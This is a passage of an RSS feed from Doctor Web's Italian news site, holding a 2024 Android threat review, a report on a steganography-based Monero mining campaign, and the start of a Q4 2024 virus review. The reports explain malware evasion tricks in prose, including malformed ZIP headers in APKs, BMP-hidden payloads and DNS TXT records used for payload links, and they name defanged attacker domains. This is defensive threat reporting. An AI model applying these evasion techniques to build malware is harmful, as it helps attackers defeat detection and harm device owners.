        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.470.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.593.origin&lt;/b&gt;), 
        mirati agli utenti da molti paesi, inclusi gli stati di Asia sudorientale e Asia Pacifico. Allo stesso pubblico erano rivolti anche attacchi di altri trojan. 
        Ad esempio, gli utenti di dispositivi Android sudcoreani dovevano affrontare le famiglie Fakecalls
        (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.919.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14423&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5297&lt;/b&gt;), 
        IOBot (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.IOBot.1.origin&lt;/b&gt;) e Wroba (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.360.origin&lt;/b&gt;). Altre varianti di Wroba 
        (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.907.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1128.origin&lt;/b&gt;) 
        attaccavano gli utenti da Giappone.
    &lt;/p&gt;
    &lt;p&gt;
        Gli abitanti di Cina, tra l'altro, riscontravano il trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.480.origin&lt;/b&gt;, 
        e quelli vietnamiti — &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1111.origin&lt;/b&gt;. 
        Allo stesso tempo, i malintenzionati impiegavano i trojan TgToxic (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.TgToxic.1&lt;/b&gt;) per attacchi ai clienti di istituzioni 
        creditizie di Indonesia, Thailandia e Taiwan, e il trojan GoldDigger 
        (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GoldDigger.3&lt;/b&gt;) per attacchi agli utenti da Thailandia e Vietnam.
    &lt;/p&gt;
    &lt;p&gt;
        Di nuovo sono stati registrati attacchi agli utenti iraniani — loro dovevano affrontare i banker come &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.709.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5292&lt;/b&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.777.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1106.origin&lt;/b&gt; e una serie di altri. Mentre negli attacchi ai clienti turchi di banche, 
        accanto ad altri trojan, sono stati notati anche i campioni della famiglia Tambir 
        (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1104.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1099.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1117.origin&lt;/b&gt;).
    &lt;/p&gt;
    &lt;p&gt;
        Tra i proprietari di dispositivi Android indiani sono diventati diffusi i banker &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.797.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.817.origin&lt;/b&gt; 
        e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5435&lt;/b&gt; — essi si mascheravano da software presumibilmente correlati alle istituzioni creditizie Airtel Payments Bank, PM KISAN e IndusInd Bank. 
        Oltre a questo, è persistita l'attività dei trojan bancari Rewardsteal  (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.719.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5147&lt;/b&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5443&lt;/b&gt;) il cui obiettivo principale sono i clienti indiani delle banche Axis bank, HDFC Bank, SBI, ICICI Bank, RBL bank e Citi bank.
    &lt;/p&gt;
    &lt;p&gt;
        Nei paesi di America Latina di nuovo è stata notata l'attività dei trojan PixPirate (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1026.origin&lt;/b&gt;), che attaccano i clienti di banche brasiliane.
    &lt;/p&gt;
    &lt;p&gt;
        Agli utenti europei erano mirati, in particolare, i trojan Anatsa (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.Anatsa.1.origin&lt;/b&gt;) e Copybara (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.15140&lt;/b&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1100.origin&lt;/b&gt;). Questi ultimi attaccano principalmente gli abitanti di Italia, Gran Bretagna e Spagna.
    &lt;/p&gt;
    &lt;p&gt;
        Durante il 2024, gli analisti dei virus Doctor Web registravano una crescita della popolarità di alcuni metodi di protezione dall'analisi e dal rilevamento dei malware Android — 
        principalmente dei trojan bancari. In particolare, i malintenzionati effettuavano diverse manipolazioni con il formato ZIP — la base di file APK. Come risultato, molti strumenti 
        di analisi statica che impiegano gli algoritmi standard di elaborazione di archivi ZIP non sono in grado di elaborare correttamente tali file "danneggiati". Contemporaneamente, i 
        trojan vengono percepiti dal sistema operativo Android come normali programmi, vengono installati e funzionano correttamente.
    &lt;/p&gt;
    &lt;p&gt;
        Una delle tecniche più diffuse è stata la manipolazione con i campi &lt;span class="string"&gt;compression method&lt;/span&gt; e &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        nella struttura dell'intestazione del file locale all'interno dell'APK. Gli attori delle minacce intenzionalmente specificano valori errati dei campi 
        &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        e &lt;span class="string"&gt;uncompressed size&lt;/span&gt; (dimensione compressa e dimensione non compressa), o scrivono un metodo di compressione non corretto o inesistente nel campo 
        &lt;span class="string"&gt;compression method&lt;/span&gt;. In un'altra variante, per l'archivio può essere indicato il metodo senza compressione, ma i campi delle intestazioni 
        &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        e &lt;span class="string"&gt;uncompressed size&lt;/span&gt; non corrisponderanno, benché debbano corrispondere.
    &lt;/p&gt;
    &lt;p&gt;
        Un altro popolare metodo è utilizzare dati su disco non corretti nella voce ECDR (End of Central Directory Record, fine della voce della directory centrale) 
        e CD (Central Directory, intestazione del file della directory centrale — qui si trovano i dati sui file e parametri dell'archivio). Entrambi questi parametri 
        per un archivio completo devono corrispondere, ma i cybercriminali possono specificare per essi valori diversi, come se questo non sia un archivio completo, ma un multiarchivio.
    &lt;/p&gt;
    &lt;p&gt;
        Era diffusa anche la tecnica con cui nelle intestazioni dei file locali di alcuni file nell'archivio viene indicato un flag che significa che questi file sono crittografati. 
        In realtà, essi non sono crittografati, ma a causa di questo, l'archivio non viene letto correttamente durante l'analisi.
    &lt;/p&gt;
    &lt;p&gt;
        Insieme alla manipolazione della struttura di file APK, gli autori dei virus adoperavano anche altri metodi — ad esempio, la modifica del file di configurazione di applicazioni Android 
        &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt;. In particolare, aggiungevano byte spazzatura &lt;span class="string"&gt;b'\x00'&lt;/span&gt; 
        alla struttura degli attributi del file per cui questo ultimo non viene letto correttamente.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="future"&gt;
    &lt;h2 class="alignCenter"&gt;Prospettive e tendenze&lt;/h2&gt;
    &lt;p&gt;
        L'anno appena trascorso ha mostrato che i criminali informatici continuano ad arricchirsi attivamente a scapito dei proprietari di dispositivi Android. 
        I loro principali strumenti restano i trojan pubblicitari e bancari, le applicazioni malevole con funzionalità spia, nonché i software fraudolenti. 
        In relazione a ciò, nel 2025 ci si può aspettare la comparsa di nuove minacce di questo tipo.
    &lt;/p&gt;
    &lt;p&gt;
        Nonostante le misure che vengono adottate per aumentare la sicurezza di Google Play, questo store rimane ancora una delle fonti di distribuzione di minacce Android. 
        Pertanto, non si può escludere la comparsa in esso di nuove applicazioni malevole e indesiderate.
    &lt;/p&gt;
    &lt;p&gt;
        Un ennesimo caso di infezione di box TV con sistema operativo Android, rilevato l'anno scorso, suggerisce che gli autori di virus utilizzano un'ampia gamma di vettori di attacco. 
        È molto probabile che i malintenzionati non solo rivolgeranno nuovamente la loro attenzione a tali dispositivi, ma continueranno anche a cercare altri potenziali obiettivi tra la 
        diversità di gadget Android.
    &lt;/p&gt;
    &lt;p&gt;
        Non si può escludere che gli autori di virus continueranno a introdurre attivamente nuovi metodi per bypassare l'analisi e il rilevamento di programmi malevoli.
    &lt;/p&gt;
    &lt;p&gt;
        Gli specialisti dell'azienda Doctor Web continuano a seguire l'evoluzione delle minacce cyber "mobili" e a fornire la protezione dei nostri utenti. Per migliorare la propria 
        sicurezza, installate l'antivirus Dr.Web per dispositivi mobili che aiuterà a contrastare i programmi malevoli, indesiderati e altri software pericolosi, i truffatori e altre minacce.
    &lt;/p&gt;
&lt;/section&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2024 review of virus activity on mobile devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=14976&amp;lng=it</guid><title>Dottore, queste immagini dove le ha prese? Uso della steganografia per il mining di criptovalute</title><link>https://news.drweb-av.it/show/?i=14976&amp;lng=it&amp;c=9</link><pubDate>Fri, 24 Jan 2025 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;24 gennaio 2025&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Nel corso di un'analisi di dati di telemetria, gli specialisti del laboratorio dei virus Doctor Web hanno individuato campioni di software malevoli che, a un esame più attento, si sono rivelati componenti di una campagna attiva di mining della criptovaluta Monero. Questa campagna è degna di nota per la sua realizzazione sotto forma di diverse catene malevole, due di cui si basano sull'avvio di script che estraggono payload malevoli da file di immagine in formato BMP.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;La campagna è probabilmente iniziata nel 2022, quando è stato osservato un file eseguibile, &lt;span class="string"&gt;Services.exe&lt;/span&gt;, che è un'applicazione .NET che avvia uno script VBscript. Questo script realizza le funzionalità di backdoor contattando il server dei malintenzionati ed eseguendo gli script e i file ricevuti in risposta. Così, sul computer della vittima veniva scaricato un file malevolo, &lt;span class="string"&gt;ubr.txt&lt;/span&gt;, che è uno script per l'interprete PowerShell, di cui l'estensione è stata cambiata da ps1 a txt.&lt;/p&gt;
&lt;p&gt;Lo script &lt;span class="string"&gt;ubr.txt&lt;/span&gt; controlla la presenza di cryptominer che potevano già essere installati sulla macchina compromessa, e li sostituisce con le versioni necessarie per i malintenzionati. I file che vengono installati dallo script rappresentano un cryptominer e le sue impostazioni, denominato SilentCryptoMiner, tramite il quale gli hacker minavano la criptovaluta Monero.&lt;/p&gt;

&lt;p&gt;Abbiamo già &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb-av.it/show/?i=14920&amp;lng=it"&gt;scritto diverse volte&lt;/a&gt; sull'utilizzo di &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb-av.it/show/?lng=it&amp;i=14792&amp;c=23"&gt;questo cryptominer&lt;/a&gt; da parte dei malintenzionati, che vengono attratti dalla sua semplicità di configurazione, le ampliate possibilità di estrazione di vari tipi di criptovalute e di mascheramento dalle utility di diagnostica, nonché il supporto della gestione remota di tutti i cryptominer in una botnet tramite console web.&lt;/p&gt;
&lt;p&gt;Nell'ambito di questa campagna, i file del cryptominer vengono mascherati da vari software, in particolare, quello per l'effettuazione di videochiamate in Zoom (&lt;span class="string"&gt;ZoomE.exe&lt;/span&gt; e &lt;span class="string"&gt;ZoomX.exe&lt;/span&gt;) o quello di servizio di Windows (&lt;span class="string"&gt;Service32.exe&lt;/span&gt; e &lt;span class="string"&gt;Service64.exe&lt;/span&gt;) ecc. Nonostante esistano più set di file malevoli che hanno nomi diversi, tutti essi svolgono gli stessi compiti — eliminazione di altri cryptominer, installazione del nuovo cryptominer e consegna degli aggiornamenti per esso.&lt;/p&gt;


&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Script PowerShell &lt;span class="string"&gt;ubr.txt&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In aggiunta, il cryptominer si connette a un dominio, getcert[.]net, su cui è situato un file, &lt;span class="string"&gt;m.txt&lt;/span&gt;, con le impostazioni di mining di criptovalute. Questa risorsa è anche impiegata in altre catene.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;File &lt;span class="string"&gt;m.txt&lt;/span&gt; contenente le impostazioni del cryptominer&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Successivamente, i malintenzionati hanno modificato la metodologia di attacco, rendendola molto più interessante e cominciando a utilizzare strumenti di steganografia.&lt;/p&gt;

&lt;blockquote&gt;
    La steganografia è un metodo che consiste nel nascondere un'informazione all'interno di un'altra. A differenza della crittografia, in cui i dati criptati potrebbero attirare l'attenzione su di sé, la steganografia consente di nascondere impercettibilmente le informazioni, ad esempio, in un'immagine. Molti esperti di cybersicurezza ritengono che la popolarità dell'uso della steganografia per il bypassare gli strumenti di sicurezza continuerà a crescere.
&lt;/blockquote&gt;

&lt;div class="fx -part_2 fxItemsCenter"&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;

&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Immagine a sinistra (autore di foto originale: &lt;a target="_blank" rel="noopener noreferrer" href="https://unsplash.com/@marekpiwnicki"&gt;Marek Piwnicki&lt;/a&gt;) contiene in sé un'immagine nascosta con il logo dell'azienda Doctor Web&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;La seconda catena, più recente, è realizzata per il tramite di un trojan, Amadey, che avvia uno script PowerShell, &lt;span class="string"&gt;Async.ps1&lt;/span&gt;, il quale scarica immagini in formato BMP da un sito di hosting di immagini legittimo, imghippo.com. Tramite gli algoritmi steganografici, dalle immagini vengono estratti due file eseguibili: uno stealer, &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.PackedNET.2429&amp;lng=it"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt;, e un payload il quale:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;
        disattiva la richiesta UAC di aumento dei permessi per amministratori,
    &lt;/li&gt;
    &lt;li&gt;
        apporta numerose eccezioni all'antivirus incorporato Windows Defender,
    &lt;/li&gt;
    &lt;li&gt;
        disattiva le notifiche in Windows,
    &lt;/li&gt;
    &lt;li&gt;
        crea un nuovo task nel percorso &lt;span class="string"&gt;\Microsoft\Windows\WindowsBackup\&lt;/span&gt; con il nome 'User'.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contenuto dello script &lt;span class="string"&gt;Async1.ps&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante l'esecuzione del task, vengono contattati i domini dei malintenzionati, nel cui record DNS TXT è contenuto l'indirizzo di conservazione del payload successivo. Dopo il suo download, viene decompresso un archivio con immagini in formato BMP e vengono avviati i seguenti file:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;
&lt;p&gt;
    &lt;span class="string"&gt;Cleaner.txt&lt;/span&gt; — script PowerShell che elimina qualsiasi altro cryptominer,
   &lt;/p&gt;
 &lt;/li&gt;
    &lt;li&gt;
&lt;p&gt;
    &lt;span class="string"&gt;m.txt&lt;/span&gt; — script PowerShell che estrae un payload dalle immagini m.bmp e IV.bmp. Il payload all'interno delle immagini è il cryptominer SilentCryptoMiner e l'injector che lo avvia,
&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
&lt;p&gt;
    &lt;span class="string"&gt;Net.txt&lt;/span&gt; — script che legge il record DNS TXT dai domini windowscdn[.]site e buyclients[.]xyz. In questo record si trova un link a un payload, che porta al servizio raw.githack[.]com.
   &lt;/p&gt;
 &lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
    Il record DNS TXT rappresenta un'estensione del record standard DNS e contiene un testo che viene utilizzato per scopi legittimi per la verificazione di un dominio. Ciononostante, il proprietario di un dominio può inserire in tale record dati arbitrari — ad esempio, come in questo caso, un link a un payload.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contenuto dell'archivio con le immagini malevole&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I moduli del cryptominer sono in continua evoluzione. Di recente, gli autori hanno iniziato a utilizzare risorse legittime per collocare le immagini malevole e la piattaforma GitHub per conservare i payload. Inoltre, abbiamo osservati moduli che controllano gli avvii in sandbox e su macchine virtuali.&lt;/p&gt;
&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Modulo che confronta i nomi di applicazioni in esecuzione con quelli di popolari strumenti utilizzati dai ricercatori di cybersicurezza&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Uno dei portafogli, indicato nelle impostazioni del cryptominer, è stato creato a maggio 2022, e fino ad oggi su di esso sono stati trasferiti 340 XMR. Tuttavia, il tasso di cambio di questa criptovaluta sta attraversando un periodo di significativa volatilità, quindi in questo caso il profitto dei truffatori potrebbe ammontare a 65–70 mila USD. A giudicare dalla forma ondulata della curva dell'hashrate, che indica accensioni e spegnimenti regolari dei computer, in questa campagna di mining sono coinvolti per lo più utenti ordinari che si trovano in uno stesso gruppo di fusi orari. L'hashrate medio è di 3,3 milioni di hash al secondo, il che consente alle macchine compromesse di portare ai malintenzionati 1 XMR in 40 ore.&lt;/p&gt;
&lt;p&gt;Questa campagna è soltanto la punta di un iceberg nel mondo delle minacce cyber basate su strumenti di steganografia, ed essa sottolinea quanto sia importante stare attenti nello spazio digitale. Le raccomandazioni dell'azienda Doctor Web rimangono invariate: installate software solo da fonti affidabili, non aprite link sospetti e non disattivate la protezione antivirus quando scaricate file da internet.&lt;/p&gt;


&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_ru.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_ru_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Schema di attacco&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/get_cert%20campaign"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a target="_blank" rel="noopener noreferrer" href="https://vms.drweb-av.it/virus/?lng=it&amp;i=25898223"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=PowerShell.Starter.98&amp;lng=it"&gt;&lt;b&gt;PowerShell.Starter.98&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=PowerShell.DownLoader.1640&amp;lng=it"&gt;&lt;b&gt;PowerShell.DownLoader.1640&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.PackedNET.2429&amp;lng=it"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=VBS.DownLoader.2822&amp;lng=it"&gt;&lt;b&gt;VBS.DownLoader.2822&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=14959&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in IV trimestre 2024</title><link>https://news.drweb-av.it/show/?i=14959&amp;lng=it&amp;c=9</link><pubDate>Thu, 26 Dec 2024 03:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;26 dicembre 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web nel IV trimestre 2024 il numero totale di minacce rilevate è diminuito dell'1,53% rispetto al III trimestre. Il numero di minacce uniche, invece, è aumentato del 94,43%. Il più spesso venivano rilevati le applicazioni pubblicitarie e i trojan pubblicitari, gli script malevoli, nonché i trojan che vengono distribuiti come parte di altre applicazioni malevole e utilizzati per ostacolarne il rilevamento. Nel traffico email il più frequentemente venivano rilevati gli script malevoli, i trojan pubblicitari e i trojan cryptominer. Inoltre, veniva notata un'elevata attività dei programmi malevoli con funzionalità spia.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Gli utenti i cui file sono stati colpiti da trojan ransomware di criptazione il più spesso si imbattevano in &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.26996&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;p&gt;Sui dispositivi Android, le minacce più diffuse di nuovo erano i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Allo stesso tempo, i nostri analisti dei virus hanno rilevato sullo store di app Google Play un gran numero di nuovi programmi malevoli.&lt;/p&gt;

  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principali tendenze di IV trimestre&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Le applicazioni pubblicitarie e i trojan pubblicitari continuano a essere leader per numero di rilevamenti&lt;/li&gt;
      &lt;li&gt;Ci sono più minacce uniche rispetto al trimestre precedente&lt;/li&gt;
      &lt;li&gt;Elevata attività dei programmi trojan spia nel traffico email&lt;/li&gt;
      &lt;li&gt;Distribuzione di numerosi programmi trojan tramite Google Play&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/01_stat_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/01_stat_q4_2024_en.1.png" alt="Secondo i dati del servizio delle statistiche Doctor Web"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;Minacce più diffuse di IV trimestre:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware utilizzato come installer intermedio di software pirata.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di premuta del pulsante Escape chiudendole forzatamente ("разработчика" – rus. "di sviluppatore", "розробника" – ucr. "di sviluppatore").&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
